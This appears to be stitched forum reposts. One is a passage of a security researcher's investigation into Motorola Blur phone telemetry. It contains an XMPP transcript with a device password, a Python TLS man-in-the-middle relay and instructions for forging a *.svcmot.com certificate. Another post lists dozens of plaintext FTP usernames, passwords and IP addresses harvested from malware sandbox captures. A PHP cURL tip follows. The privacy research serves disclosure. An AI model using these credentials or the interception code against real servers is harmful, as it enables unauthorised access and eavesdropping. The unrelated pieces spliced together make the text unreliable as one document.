- Statistics about how those applications are used (e.g. how much data each one has sent and received).
- Phone call and text message statistics. For example, how many calls have been received or missed.
- Bluetooth device pairing and unpairing, including detailed information about those devices.
- Email addresses/usernames for accounts configured on the device.
- Contact statistics (e.g. how many contacts are synced from Google, how many Facebook users are friends of the account I've configured on the device).
- Device-level event logs (these are sent to Google as well by a Google-developed checkin mechanism).
- Debugging/troubleshooting information about most activities the phone engages in.
- Signal strength statistics and data use for each type of radio included in the device. For example, bytes sent/received via 3G versus wifi.
- Stack memory and register dumps related to applications which have crashed.
- For Exchange ActiveSync setup, the server name and email address, as well as the details of the security policy enforced by that EAS server.

Information that may be being collected

- The terms-of-use/privacy policy for the Blur service (whether you know you're using it or not) explicitly specifies that location information (e.g. GPS coordinates) may be collected (see Speaking of that privacy policy..., below). I have not seen this in the data I've intercepted. This may be due to it being represented in a non-obvious format, or it may only be collected under certain conditions, or it may only be collected by newer devices than my 2-year-old Droid X2.
- While I have no conclusive evidence, I did notice while adding and removing accounts from my phone that the account ID number for a newly-added account is always higher than that for any accounts that existed previously on the device, even if those accounts have been deleted. This implies to me that Motorola's Blur service may be storing information about the accounts I've "deleted" even though they're no longer visible to me. This seems even more likely given the references in the communication to "universalAccountIds" and "knownAccountIds" referenced by GUID/UUID-like values.
[Screenshots - Check-in data being sent to Motorola: "Application use stats", "Basic hardware properties", "Bluetooth headset use-tracking", "Data use, SMS text, contact, and CPU stats", "Label in the battery compartment of my phone", "BlurID, IMEI and barcode (from label), IMSI and phone number", "EAS setup information", "EAS policy elements", "Email and Disk Stats", "Event logs (these are also captured by Google)", "Image upload bug", "Logging of newly-installed applications", "Missed calls", "I told you it was syncing every nine minutes!", "Possible client-side SQL injection vulnerability", "Radio and per-application stats (e.g. CPU use by app)", "Register and stack memory dump", "Sync App IDs: 10, 31, 80", "Sync App IDs: 40, 70, 20, 2, 60, and 5", "System panic auto-reboot". The "sync app ID" information will become more important in the section about XMPP. The system panic message has all of the regular boot information as well as the reason for the OS auto-reboot (in my case, apparently there is a problem with the modem).]

Analysis - Jabber / XMPP stream communication

In some of the check-in logs, I saw entries that read e.g.:

XMPPConnection: Preparing to connect user XXXXXXXXXXXXXXXX to service: jabber-cloud112-blur.svcmot.com on host: jabber-cloud112-blur.svcmot.com and port: 5222
XMPPConnectionManager I:onConfigurationUpdate: entered
XMPPConnectionManager I:onConfigurationUpdate: exiting
WSBase I:mother told us it's okay to retry the waiting requests: 0
NormalAsyncConnection I:Connected local addr: 192.168.253.10/192.168.253.10:60737 to remote addr: jabber-cloud112-blur.svcmot.com/69.10.176.46:5222
TLSStateManager I:org.apache.harmony.nio.internal.SocketChannelImpl@XXXXXXXX: Wrote out 212 bytes of data with 0 bytes remaining.
TLSStateManager I:org.apache.harmony.nio.internal.SocketChannelImpl@XXXXXXXX: Read 202 bytes into buffer
TLSStateManager I:org.apache.harmony.nio.internal.SocketChannelImpl@XXXXXXXX: Read 262 bytes into buffer
TLSStateManager I:org.apache.harmony.nio.internal.SocketChannelImpl@XXXXXXXX: Wrote out 78 bytes of data with 0 bytes remaining.
TLSStateManager I:org.apache.harmony.nio.internal.SocketChannelImpl@XXXXXXXX: Read 1448 bytes into buffer
TLSStateManager I:org.apache.harmony.nio.internal.SocketChannelImpl@XXXXXXXX: Read 2896 bytes into buffer
XMPPConnection I:Finished connecting user XXXXXXXXXXXXXXXX to service: jabber-cloud112-blur.svcmot.com on host: jabber-cloud112-blur.svcmot.com and port: 5222

By running a network capture, I was able to confirm that my phone was regularly attempting this type of connection. However, it was encrypted using TLS, so I couldn't see the content of the communication at first.

The existence of this mechanism made me extremely curious. Why did Motorola need yet another communication channel for my phone to talk to them over? Why were they using a protocol intended for instant messaging/chat? The whole thing sounded very much like a botnet (which often use IRC in this way) to me.

Intercepting these communications ended up being much more work than I expected. XMPP is an XML-based protocol, and cannot be proxied by an HTTP/HTTPS proxy, so using Burp Suite or ZAP was out. My first thought was to use Mallory, an intercepting transparent proxy that I learned about in the outstanding SANS SEC 642 class back in March of 2013. Mallory is a relatively new tool, and is somewhat finicky to get set up, but I learned a lot doing so.
Unfortunately, XMPP is not a protocol that Mallory can intercept as of this writing. The VM that I built to run Mallory on still proved useful in this case, as I was eventually able to hack together a custom XMPP man-in-the-middle exploit and view the contents of the traffic. If you'd like to know more about the details, they're in the Steps to reproduce - XMPP communication channel section further down this page.

This channel is at least part of the Motorola Blur command-and-control mechanism. I haven't seen enough distinct traffic pass through it to have a good idea of the full extent of its capabilities, but I know that:

- The XMPP/Jabber protocol is re-purposed for command-and-control use. For example, certain types of message are sent using the field normally used for "presence" status in IM.
- The values exchanged in the presence fields appear to be very short (five-character) base64-encoded binary data, followed by a dash, and then a sequence number. For example, 4eTO3-52, Ugs6j-10, or t2bcA-0. The base64 value appears to be selected at boot. The sequence number is incremented differently based on criteria I don't understand (yet), but the most common step I've seen is +4.
- As long as the channel is open, the phone will check in with Motorola every nine minutes.
- At least one type of Motorola-to-phone command exists: a trigger to update software by ID number. At least three such ID numbers exist: 31, 40, and 70 (see the table below). Each of these triggers an HTTP POST request to the blur-services-1.0/ws/sync API method seen in the previous section, and the same IDs are logged in the check-in data.
- The stream token and username passed to the service are the "blurid" value (represented as a decimal number) which shows up in various places in the other traffic between the phone and Motorola.

ID | Name                     | Purpose                                                                         | Data Format | Observed In Testing?
2  | BlurSettingsSyncHandler  | Unknown                                                                         | JSON        | No
5  | BlurSetupSyncHandler     | Unverified - called when a new type of sync needs to be added?                  | gpb         | Yes
10 | BlurContactsSyncHandler  | Syncs contact information (e.g. Google account contacts)                        | gpb         | No
20 | SNMailSyncHandler        | Unverified - probably syncs private messages from social networking sites      | gpb         | No
31 | StatusSyncHandler        | Syncs current status/most-recent-post information from social networking sites | gpb         | Yes
40 | BlurSNFriendsSyncHandler | Syncs friend information from social networking sites                           | gpb         | Yes
50 | NewsRetrievalService     | Syncs news feeds set up in the built-in Motorola app                            | gpb         | Yes
60 | AdminFlunkySyncHandler   | Unverified - sounds like some sort of remote-support functionality              | gpb         | No
70 | FeedReceiverService      | Unknown                                                                         | gpb         | Yes
80 | SNCommentsSyncHandler    | Syncs status/comment information from social networking sites                   | gpb         | Yes

The "gpb" data format is how that type of binary encoding is referred to internally by the client logs. I believe it is similar (possibly identical) to Google's "protocol buffer" system.

Here is an example session, including the SYNC APP command being sent by the server. Traffic from the client is prefixed below with C:, and traffic from the server with S: (the original page distinguished them by colour).

C: <stream:stream token="XXXXXXXXXXXXXXXX" to="jabber-cloud112-blur.svcmot.com" xmlns="jabber:client" xmlns:stream="http://etherx.jabber.org/streams" version="1.0"><starttls xmlns="urn:ietf:params:xml:ns:xmpp-tls"/>

S: <?xml version='1.0' encoding='UTF-8'?><stream:stream xmlns:stream="http://etherx.jabber.org/streams" xmlns="jabber:client" from="xmpp.svcmot.com" id="concentrator08228e8bb1" xml:lang="en" version="1.0">

S: <stream:features><starttls xmlns="urn:ietf:params:xml:ns:xmpp-tls"></starttls><mechanisms xmlns="urn:ietf:params:xml:ns:xmpp-sasl"></mechanisms><auth xmlns="http://jabber.org/features/iq-auth"/></stream:features><proceed xmlns="urn:ietf:params:xml:ns:xmpp-tls"/>

[Communication after this point takes place over the encrypted channel which the client and server have negotiated.]
C: <stream:stream token="XXXXXXXXXXXXXXXX" to="xmpp.svcmot.com" xmlns="jabber:client" xmlns:stream="http://etherx.jabber.org/streams" version="1.0">

S: <?xml version='1.0' encoding='UTF-8'?><stream:stream xmlns:stream="http://etherx.jabber.org/streams" xmlns="jabber:client" from="xmpp.svcmot.com" id="concentrator08228e8bb1" xml:lang="en" version="1.0"><stream:features><mechanisms xmlns="urn:ietf:params:xml:ns:xmpp-sasl"></mechanisms><auth xmlns="http://jabber.org/features/iq-auth"/></stream:features>

C: <iq id="4eTO3-24" type="set"><query xmlns="jabber:iq:auth"><username>4503600105521277</username><password>1-d052e26d5bbb5b4adce7965e3e248a331765623714</password><resource>BlurDevice</resource></query></iq><iq id="4eTO3-25" type="get"><query xmlns="jabber:iq:roster"></query></iq><presence id="4eTO3-26"></presence>

S: <iq type="result" id="4eTO3-24"/>

S: <message xmlns="urn:xmpp:motorola:motodata" id="0J8Hc-30570875" to="XXXXXXXXXXXXXXXX@jabber01.mm211.dc2b.svcmot.com"><data xmlns="com:motorola:blur:push:data:1">{"Sync":{"APP":[{"d":"sync_app_id: 31\n","q":0}]}}</data></message>

[Screenshots - XMPP communication channel: "XMPPPeek in action", "App ID 31 (social networking status) sync", "App ID 40 (friends) sync", "App ID 50 (news) sync", "App ID 80 (social networking comments and status) sync". A few examples of the sync operations triggered by the XMPP communication channel.]
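XMPPPeek itself isn't reproduced in the article. Purely as an illustration of the approach it describes - this is my own sketch, not the actual tool, and the hostnames, file names, and single-read assumptions are mine - a TLS-terminating XMPP intercept in Python could look roughly like this:

import socket
import ssl
import threading

# All names here are my own; XMPPPeek is a separate tool.
UPSTREAM = ("jabber-cloud112-blur.svcmot.com", 5222)   # host seen in the check-in logs
FORGED_CERT, FORGED_KEY = "svcmot.pem", "svcmot.key"   # forged *.svcmot.com cert/key

def pump(src, dst, tag):
    # Relay decrypted stanzas between the two TLS sessions, printing them.
    while True:
        data = src.recv(4096)
        if not data:
            break
        print(tag, data.decode("utf-8", "replace"))
        dst.sendall(data)

def handle(phone):
    server = socket.create_connection(UPSTREAM)
    # Plaintext phase: forward the phone's stream header + <starttls/>, then
    # relay the server's reply until <proceed/> is seen (assumes the phone's
    # opener arrives in a single read, which matches the session above).
    server.sendall(phone.recv(4096))
    reply = b""
    while b"<proceed" not in reply:
        chunk = server.recv(4096)
        if not chunk:
            return
        reply += chunk
    phone.sendall(reply)
    # Both sides now expect TLS: terminate the phone's TLS using the forged
    # certificate, and open a separate TLS session to the real server.
    down = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
    down.load_cert_chain(FORGED_CERT, FORGED_KEY)
    phone_tls = down.wrap_socket(phone, server_side=True)
    up = ssl.create_default_context()
    up.check_hostname = False          # we are deliberately in the middle
    up.verify_mode = ssl.CERT_NONE
    server_tls = up.wrap_socket(server, server_hostname=UPSTREAM[0])
    threading.Thread(target=pump, args=(phone_tls, server_tls, "C->S"), daemon=True).start()
    pump(server_tls, phone_tls, "S->C")

listener = socket.socket()
listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
listener.bind(("0.0.0.0", 5222))       # iptables redirects port 5222 here
listener.listen(5)
while True:
    conn, _ = listener.accept()
    threading.Thread(target=handle, args=(conn,), daemon=True).start()

Once the TLS layer is stripped this way, the Sync APP push seen in the transcript is just a JSON payload inside an XMPP <message> stanza.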
While I have seen very little sensitive data being sent as a result of this mechanism, Motorola's privacy policy/terms-of-service related to this system makes me more concerned. There is literally no reason I can think of that I would want my phone to check in with Motorola every nine minutes to see if Motorola has any new instructions for it to execute. Is there some sort of remote-control capability intended for use by support staff? I know there is a device-location and remote wipe function, because those are advertised as features of Blur (apparently even if you didn't explicitly sign up for Blur).

Speaking of that privacy policy...

I honestly can't remember if I explicitly agreed to any sort of EULA when I originally set up my phone. There are numerous "terms of service" and "privacy policy" documents on the Motorola website which all seem designed to look superficially identical, but this one in particular (the one for the actual "Motorola Mobile Services" system (AKA "Blur")) has a lot of content I really don't like, and which is not present in the other, similar documents on their site that are much easier to find. For example, it specifically mentions capturing social networking credentials, as well as uploading GPS coordinates from customers' phones to Motorola. It is specific to "Motorola Mobile Services", and I know I didn't explicitly sign up for that type of account (which is probably why my phone is using a randomly-generated username and password to connect). I also know that even if I was presented with a lengthy statement which included statements about storing social media credentials, that happened when I originally bought the phone (about two years ago). Should I not have been at least reminded of this when I went to add a social networking account for the first time? Or at a bare minimum, should my phone not let me view any document I allegedly agreed to? The only reason I know of that particular TOS is because I found it referenced in a Motorola forum discussion about privacy concerns. In any case, here are some interesting excerpts from that document (as of 22 June, 2013). All bold emphasis is mine. I am not a lawyer, and this is not legal advice.

"Using the MOTOROLA MOBILE SERVICES software and services (MOTOROLA MOBILE SERVICES) constitutes your acceptance of the terms of the Agreement without modification. If you do not accept the terms of the Agreement, then you may not use MOTOROLA MOBILE SERVICES."

"Motorola collects and uses certain information about you and your mobile device ... (1) your device's unique serial number ... (5) when your device experiences a software crash ... (1) use of hardware functions like the accelerometer, GPS, wireless antennas, and touchscreen; (2) wireless carrier and network information; (3) use of accessories like headsets and docks; (4) data usage ... Personal Information such as: (1) your email and social network account credentials; (2) user settings and preferences; (3) your email and social network contacts; (4) your mobile phone number; and (5) the performance of applications installed on your device. ... MOTOROLA MOBILE SERVICES will never collect the specific content of your communications or copies of your files."

The document makes a promise that the content of communications is not collected, but I have screenshots and raw data that show Facebook and Twitter messages as well as photos passing through their servers. The agreement specifies "when your device experiences a software crash", not "memory dumps taken at the time of a software crash", which are what is actually collected.

"Motorola takes privacy protection seriously. MOTOROLA MOBILE SERVICES only collects personal information, social network profile data, and information about websites you visit if you create a MotoCast ID, use the preinstalled web browser and/or MOTOROLA MOBILE SERVICES applications and widgets like Messaging, Gallery, Music Player, Social Networking and Social Status. If you use non-Motorola applications for email, social networking, sharing content with your friends, and web browsing, then MOTOROLA MOBILE SERVICES will not collect this information. Even if you decline to use the preinstalled browser or the MOTOROLA MOBILE SERVICES applications and widgets, your device will continue to collect information about the performance of your mobile device and how you use your mobile device unless you choose to opt out."

In non-Motorola builds of Android, most/all of those components are still present, but none of them send data to Motorola.
Some people might think it was extremely deceptive to add data collection to those components but not make user-visible changes to them that mentioned this. Oh, and of course the OS is still collecting massive amounts of data even if you don't use the modified basic Android functionality.

"MOTOROLA MOBILE SERVICES only collects and uses information about the location of your mobile device if you have enabled one or more location-based services, such as your device's GPS antenna, Google Location Services, or a carrier-provided location service. If you turn these features off in your mobile device's settings, MOTOROLA MOBILE SERVICES will not record the location of your mobile device."

So what you're saying is that all I have to do to prevent Motorola from tracking my physical location is disable core functionality on my device and leave it off permanently? Awesome! Thanks so much!

"The security of your information is important to Motorola. When MOTOROLA MOBILE SERVICES transmits information from your mobile device to Motorola, MOTOROLA MOBILE SERVICES encrypts the transmission of that information using secure socket layer technology (SSL)."

Except when it doesn't, which is most of the time.

"However, no data stored on a mobile device or transmitted over a wireless or interactive network can ever be 100 percent secure, and many of the communications you make using MOTOROLA MOBILE SERVICES will be accessible to third parties. You should therefore be cautious when submitting any personally identifiable information using MOTOROLA MOBILE SERVICES, and you understand that you are using MOTOROLA MOBILE SERVICES at your own risk."

"As a global company, Motorola has international sites and users all over the world. The personal information you provide may be transmitted, used, stored, and otherwise processed outside of the country where you submitted that information, including jurisdictions that may not have data privacy laws that provide equivalent protection to such laws in your home country."

"You may not ... interfere with anyone's ... enjoyment of the Services"

Uh oh.

That document does mention that anyone who wants to opt out can email privacy@motorola.com. If you have any luck with that, please let me know.

Why this is a problem

While I'm sure there are a few people out there who don't mind a major multinational corporation collecting this sort of detailed tracking information related to where their phone has been and how it's been used, I believe most people would at least like to be asked about participating in this type of activity, and be given an option to turn it off. I can think of many ways that Motorola, unethical employees of Motorola, or unauthorized third parties could misuse this enormous treasure trove of information. But the biggest question on my mind is this: now that it is known that Motorola is collecting this data, can it be subpoenaed in criminal or civil cases against owners of Motorola phones? That seems like an enormous can of worms, even in comparison to the possibilities for identity theft that Motorola's system provides for.

How secure is Motorola's Blur web service against attack?

I'd be really interested to test this myself, but made no attempt to do so because I don't have permission and Motorola doesn't appear to have a "white hat"/"bug bounty" programme. It would be a tempting target for technically-skilled criminals, due to the large volume of Facebook, Twitter, and Google usernames and passwords stored in it.
The fact that the phone actively polls Motorola for new instructions to execute and then follows those instructions without informing its owner opens all of these phones up to automated takeover by anyone who can obtain a signing SSL certificate issued by one of the authorities in the trusted CA store on those phones. Some people may consider this far-fetched, but consider that certificates of that type have been mistakenly issued in the past, and the root certificate for at least one of the CAs responsible for that type of mistake (TURKTRUST) was installed on my phone at the factory.

Is there anything good to be found here?

Motorola does appear to be using reasonably-strong authentication for the oAuth login to their system - the username seems to be a combination of the IMEI and a random number (16 digits long[2], in the case of my phone's username), and the password is a 160-bit value represented as a hex string. This would be essentially impossible to attack via brute force if the value really is random. Due to its length, I'm concerned it's a hash of a fixed attribute of the phone, but that's just a hunch.
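Footnote 2 at the end of this article notes that the 16-digit username "starts with a 4, but does not pass a Luhn check" - i.e. it merely looks like a payment card number. For anyone who wants to repeat that test, here is a minimal sketch of the standard Luhn algorithm (my illustration, not from the original article):

def luhn_ok(number: str) -> bool:
    """Standard Luhn checksum - the mod-10 test used for payment card numbers."""
    total = 0
    # Walk the digits from the right; double every second one,
    # subtracting 9 whenever the doubled digit exceeds 9.
    for i, ch in enumerate(reversed(number)):
        d = int(ch)
        if i % 2 == 1:
            d = d * 2 - 9 if d * 2 > 9 else d * 2
        total += d
    return total % 10 == 0

# e.g. the 16-digit username visible in the XMPP transcript above:
print(luhn_ok("4503600105521277"))  # False - not a valid card-style number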
The non-oAuth components (e.g. XMPP) use the Blur ID as the username, and that is all over the place, e.g. in virtually every URL (HTTP and HTTPS) that the client accesses on the Blur servers.

When uploading images to social networking sites, the Motorola software on the phone sometimes strips the EXIF tags (including geolocation tags) before uploading the image to Motorola. So at least they can't always use that as another method for determining your location.

Finally, both the XMPP and HTTPS client components of the software do validate that the certificates used for encrypted communication were issued by authorities the phone is configured to trust. If the certificate presented to either component is not trusted, then no encrypted channel is established, and data which would be sent over it is queued until a trusted connection can be made. If someone wants to perform a man-in-the-middle attack, they're going to need to get their root CA cert loaded on the target phones, or obtain a signing cert issued by a trusted authority (e.g. TURKTRUST).

[Screenshots - At least their software checks SSL cert validity: "Untrusted cert - HTTPS client", "Untrusted cert - XMPP client"]

Has anyone else discovered this?

In January of 2012, a participant in a Motorola pre-release test discovered that Motorola was performing device-tracking after a Motorola support representative mentioned that the tester had reset his phone "21 times", and a forum moderator directed him to the special, hard-to-find Motorola privacy policy discussed above. To my knowledge, this article is the first disclosure of anything like the full extent of the data Motorola collects.

What I am going to do as a result of this discovery

As of 23 June 2013, I've removed my ActiveSync configuration from the phone, because I can't guarantee that proprietary corporate information isn't being funneled through Motorola's servers. I know that some information (like the name of our ActiveSync server, our domain name, and a few examples of our account-naming conventions) is, but I don't have time to exhaustively test to see what else is being sent their way, or to do that every time the phone updates its configuration. I've also deleted the IMAP configuration that connected to my personal email, and have installed K-9 Mail as a temporary workaround.

I'm going to figure out how to root this phone and install a "clean" version of Android. That will mean I can't use ActiveSync (my employer doesn't allow rooted phones to connect), which means a major reason I use my phone will disappear, but better that than risk sending their data to Motorola. I'll assume that other manufacturers and carriers have their own equivalent of this - recall the Carrier IQ revelation from 2011.

Which other models of Motorola device do this?

Right now, I have only tested my Droid X2. If you have a Motorola device and are technically-inclined, the steps to reproduce my testing are in the section below. If you get results either way and would like me to include them here, please get in touch with me using the Contact form. Please include the model of your device, the results of your testing, and your name/nickname/handle/URL/etc. if you'd like to be identified.

Steps to reproduce - HTTP/HTTPS data capture

There are a number of approaches that can be used to reproduce the results in this article. This is the method that I used. Of course, the same testing can be performed in order to validate that non-Motorola devices are or are not behaving this way.

Important: I strongly recommend that you do not modify in any way the data your phone sends to Motorola. I also strongly recommend that you do not actively probe, scan, or test in any way the Blur web service. The instructions on this page are intended to provide a means of passively observing the traffic to Motorola in order to understand what your phone may be doing without your knowledge or consent.

1. Connect a wireless access point to a PC which has at least two NICs.
2. Use Windows Internet Connection Sharing to give internet access to the wireless AP and its clients.
3. Set up an intercepting proxy on the PC. I used Burp Suite Professional for the first part of my testing, then switched to OWASP ZAP (which is free) for the rest, since I used a personal system for that phase. Make sure the proxy is accessible on at least one non-loopback address so that other devices can proxy through it.[1]
4. Configure a Motorola Android device to connect to the wireless AP, and to use the intercepting proxy for its web traffic (in the properties for that wireless connection).
5. Install the root signing certificate for the intercepting proxy on the Motorola Android device. This allows the intercepting proxy to view HTTPS traffic as well as unencrypted HTTP.
6. Power the Motorola Android device off, then back on. This seems to be necessary to cause all applications to recognize the new trusted certificate, and will also let you intercept the oAuth negotiation with Motorola.
7. Configure and use anything in the Account section of the device.
8. Use the built-in Social Networking application.
9. Take a picture and use the Share function to upload it to one or more photo-sharing services.
10. Leave the device on for long enough that it sends other system data to Motorola automatically.
Steps to reproduce - check-in data decompression

If you'd like to decompress one of these gzipped data packages, there are also a number of approaches available, but this is the one I used:

1. Export the raw (binary) request from your intercepting proxy's history. In ZAP, right-click on the history entry and choose Save Raw -> Request -> Body. In Burp Suite, right-click on the history entry and choose Save Item, then uncheck the Base64-encode requests and responses box before saving. Note: you cannot use the bulk export feature of either tool for this step to work - both of them have a quirk in which exporting individual requests preserves binary data, but exporting in bulk corrupts binary data by converting a number of values to 0x3F (maybe it's some Java library that does that when exporting as ASCII?).
2. Open the exported data in a hex editor (I use WinHex).
3. Remove everything up to the first 0x1F8B in the file. See example screenshot below.
4. Save the modified version (I added a .gz extension for clarity). See example screenshot below.
5. Decompress the resulting file using e.g. the Linux gzip -d command, or e.g. 7-Zip.
6. Open the decompressed file in a text editor that correctly interprets Unix-style line breaks (I used Notepad++, partly because it shows unprintable characters in a useful way, and there is some binary data mixed in with the text in these files).
7. Examine the data your phone is sending to Motorola.

[Screenshots - Manually removing extra data so the file will be recognized as gzipped: "GZip header (0x1F8B)", "Hex editor view of the data", "Hex editing complete"]
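Steps 2 through 5 can also be scripted. As a convenience - my own sketch, not part of the original write-up, and the function name is made up - the byte-carving and decompression look like this in Python:

import sys
import zlib

# Hypothetical helper: carve the first gzip member out of an exported
# proxy request body and decompress it, mirroring steps 2-5 above.
def extract_checkin_log(path):
    with open(path, "rb") as f:
        blob = f.read()
    start = blob.find(b"\x1f\x8b")  # the 0x1F8B gzip magic mentioned above
    if start == -1:
        raise ValueError("no gzip header found in " + path)
    # A decompressobj stops cleanly at the end of the gzip stream, so any
    # trailing non-gzip bytes in the export are simply ignored.
    d = zlib.decompressobj(wbits=16 + zlib.MAX_WBITS)
    return d.decompress(blob[start:])

if __name__ == "__main__":
    # The logs contain some binary mixed in with the text, hence "replace".
    sys.stdout.write(extract_checkin_log(sys.argv[1]).decode("utf-8", "replace"))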
Steps to reproduce - XMPP communication channel

This section requires more technical skill and time to replicate than the other two. Right now, it assumes that you have access to a Linux system that is set up with two network interfaces and which can be easily configured to forward all network traffic from the first interface to the second using iptables. If you have a system that is set up to run Mallory successfully already (even though you won't be using Mallory itself here), that would be ideal. I am preparing a detailed ground-up build document and will release that shortly. In the meantime, assuming you have such a system and some experience using this sort of thing, download XMPPPeek and you should have the tool you need.

1. Generate an SSL server certificate and private key (in PEM format) with the common name of *.svcmot.com. I made all of the elements of my forged cert match the real one as closely as possible, but I don't know how important this is other than the common name.
2. Load the CA cert you signed the *.svcmot.com cert with onto your Motorola Android device. Again, I used a CA cert that matched the human-readable elements of the one used by the real server, but I don't know how important that is in this specific case. You may need to explicitly install the forged *.svcmot.com cert onto your Motorola Android device as well.
3. Run the shell script from the XMPPPeek page to cause all traffic from the internal interface to be forwarded to the external interface, with the exception of traffic with a destination port of 5222, which should be routed to the port that XMPPPeek will be listening on.
4. Start XMPPPeek and wait for your phone to connect.

I used a VirtualBox VM with a virtual NIC which was connected for internet access, and a USB NIC which I connected to an old wireless access point. So my phone connected to that AP, which connected through the man-in-the-middle system, which connected to the actual internet connection. I configured the phone to also proxy web traffic through OWASP ZAP so that I could match up the XMPP traffic with its HTTP and HTTPS counterparts.

Footnotes

1. For example, with the default Windows ICS configuration, you can bind the proxy to 192.168.137.1:8071.
2. Mine starts with a 4, but does not pass a Luhn check, in case you were curious.

Sursa: Motorola Is Listening - Projects - Beneath the Waves
-
Infiltrating malware servers without doing anything
Nytro replied to Nytro's topic in Tutoriale in engleza
F*cking cURL... For anyone still making requests with this crappy cURL: in the URL, make sure you replace spaces with "+":

curl_setopt ($ch, CURLOPT_URL, str_replace(' ', '+', $_GET['url']));
-
[h=3]Infiltrating malware servers without doing anything[/h]

Today I was looking for more samples of BlackPOS, because this malware uses the FTP protocol. Knowing this, I was interested in crawling more panels, but then I realised something... why look only for BlackPOS instead of targeting everything? So I downloaded a random malware pack found on the internet and sent everything to Cuckoo. Then I just parsed each of the generated pcaps to pull out some stuff (simple but effective). Everything automated, of course - it's far too much to do manually, especially with a malware pack.

[Screenshots: "Cuckoo", "pcap junkie"]
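The parsing script itself isn't included in the post. Purely as an illustration of the idea - my own sketch, not the author's code, assuming scapy is installed and that each FTP command fits in a single packet - pulling FTP logins out of a Cuckoo pcap can be as simple as:

from scapy.all import IP, TCP, Raw, rdpcap  # scapy assumed available

# Illustrative only: collect USER/PASS commands sent to FTP servers (port 21)
# and print them in the same ftp://user:pass@host form as the list below.
def ftp_creds(pcap_path):
    creds = {}
    for pkt in rdpcap(pcap_path):
        if IP in pkt and TCP in pkt and Raw in pkt and pkt[TCP].dport == 21:
            line = pkt[Raw].load.decode("ascii", "ignore").strip()
            entry = creds.setdefault(pkt[IP].dst, {})
            if line.upper().startswith("USER "):
                entry["user"] = line[5:]
            elif line.upper().startswith("PASS "):
                entry["pass"] = line[5:]
    return creds

for host, c in ftp_creds("analysis.pcap").items():
    print("ftp://%s:%s@%s" % (c.get("user", "?"), c.get("pass", "?"), host))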
Here is a small part:

ftp://u479622:y6yf2023@212.46.196.140 - Win32/Usteal
ftp://4bf3-cheats:hydsaww56785678@193.109.247.80 - Win32/Usteal
ftp://u445497390:090171qq@31.170.164.56 - Win32/Usteal
ftp://raprap8:9Y7cGxOW@89.108.68.81 - Win32/Usteal
ftp://u195253707:1997qwerty@31.170.165.230 - Win32/Usteal
ftp://pronzo_615:f4690x0nq8@91.223.216.18 - Win32/Usteal
ftp://lordben8:xCoMFM2c@89.108.68.89 - Win32/Usteal
ftp://u698037800:denisok1177@31.170.165.251 - Win32/Usteal
ftp://u268995895:vovamolkov123@31.170.165.187 - Win32/Usteal
ftp://b12_8082975:951753zx@209.190.85.253 - Win32/Ganelp.gen!A
ftp://oiadoce:cremado33@187.17.122.141 - Win32/Delf.P
ftp://cotuno:nokia400@198.23.57.29 - Win32/SecurityXploded.A
ftp://fake01:13758@81.177.6.51 - WS.Reputation.1
ftp://h51694:2222559@91.227.16.13 - Win32/Usteal
ftp://fintzet5@mail.ru:856cc58e698f@93.189.41.96 - Win32/Usteal
ftp://b12_8082975:951753zx@209.190.85.253 - Win32/Usteal
ftp://h51694:2222559@91.227.16.13 - Win32/Ganelp.E
ftp://450857:6a5124c7@83.125.22.167 - Win32/Ganelp.gen!A
ftp://b12_8082975:951753zx@209.190.85.253 - Win32/Ganelp.gen!A
ftp://getmac:8F4ODYLQlvpjjQ==@222.35.250.56 - Win32/Ganelp.G
ftp://u797638036:951753zx@31.170.165.29 - Virus.Downloader.Rozena
ftp://b12_8082975:djdf3549384@10.0.2.15 - Win32/Ganelp.gen!A
ftp://onthelinux:741852abc@209.202.252.54 - Win32/Ganelp.E
ftp://b12_8082975:951753zx@209.190.85.253 - Win32/Ganelp.E
ftp://450857:6a5124c7@83.125.22.167 - Win32/Ganelp.gen!A
ftp://u206748555:as3515789@31.170.165.165 - Win32/Usteal
ftp://fintzet5@mail.ru:856cc58e698f@93.189.41.96 - Win32/Usteal
ftp://griptoloji:3INULAX@46.16.168.174 - Win32/Usteal
ftp://u459704296:ded7753191ded@31.170.164.244 - Win32/Usteal
ftp://dedmen2:reaper24chef@176.9.52.231 - Win32/Usteal
ftp://srv35913:JLN18Hp7@78.110.50.123 - F*ck this shit
ftp://ftp1970492:ziemniak123@213.202.225.201 - F*ck this shit
ftp://dron2258:NRm8CNfW@89.108.68.89 - F*ck this shit
ftp://u996543000:123456789a@31.170.165.235 - F*ck this shit
ftp://u500739002:jd7H2ni99s@31.170.165.199 - F*ck this shit
ftp://0dmaer:1780199d@193.109.247.83 - F*ck this shit
ftp://u404100999:vardan123@31.170.164.25 - F*ck this shit
ftp://a9951823:www.ry123456@31.170.161.56 - F*ck this shit
ftp://u194291799:80997171405@31.170.165.18 - F*ck this shit
ftp://u478149:qqgclnbi@212.46.196.140 - F*ck this shit
ftp://u114972719:1052483w@31.170.165.192 - F*ck this shit
ftp://a1954396:omeromer123@31.170.162.103 - F*ck this shit
ftp://googgle.ueuo.com:741852@5.9.82.27 - F*ck this shit
ftp://fr32920:Nw3hRUme@92.53.98.21 - F*ck this shit
ftp://u974422848.root:vertrigo@31.170.164.119 - F*ck this shit
ftp://u205783311:gomogej200897z@31.170.165.192 - F*ck this shit
ftp://u188483768:andrewbogdanov1@31.170.165.251 - F*ck this shit
ftp://coinmint@coinslut.com:c01nm1nt!@108.170.30.2 - F*ck this shit
ftp://agooga:nokiamarco@198.23.57.29 - F*ck this shit
ftp://nicusn:n0305441@198.23.57.29 - F*ck this shit
ftp://u355595964:xmNmK4CfvX@31.170.165.193 - F*ck this shit
ftp://fmstu421:oxjQG1i7@46.4.94.180 - F*ck this shit
ftp://u651787226:123698745s@31.170.164.98 - F*ck this shit
ftp://u492312765:530021354@31.170.165.250 - F*ck this shit
ftp://mandaryn:m0jak0chanaania@213.180.150.18 - F*ck this shit
ftp://spechos8:onxGoTDG@89.108.68.85 - F*ck this shit
ftp://6fidaini:vardan123@193.109.247.80 - F*ck this shit
ftp://8steamsell:frozenn1@195.216.243.45 - F*ck this shit
ftp://u478644:57zw1q56@212.46.196.138 - F*ck this shit
ftp://u478230:lytlz3ub@212.46.196.133 - F*ck this shit
ftp://u730739228:warhammer3@31.170.165.238 - F*ck this shit
ftp://sme8:y6kByIZA@89.108.68.85 - F*ck this shit
ftp://koctbijib1@mail.ru:83670bb9072b@93.189.41.100 - F*ck this shit
ftp://u457127536:741852963q@31.170.165.245 - F*ck this shit
ftp://u450728967:987456987@31.170.165.187 - F*ck this shit
ftp://u730739228:warhammer3@31.170.165.238 - F*ck this shit
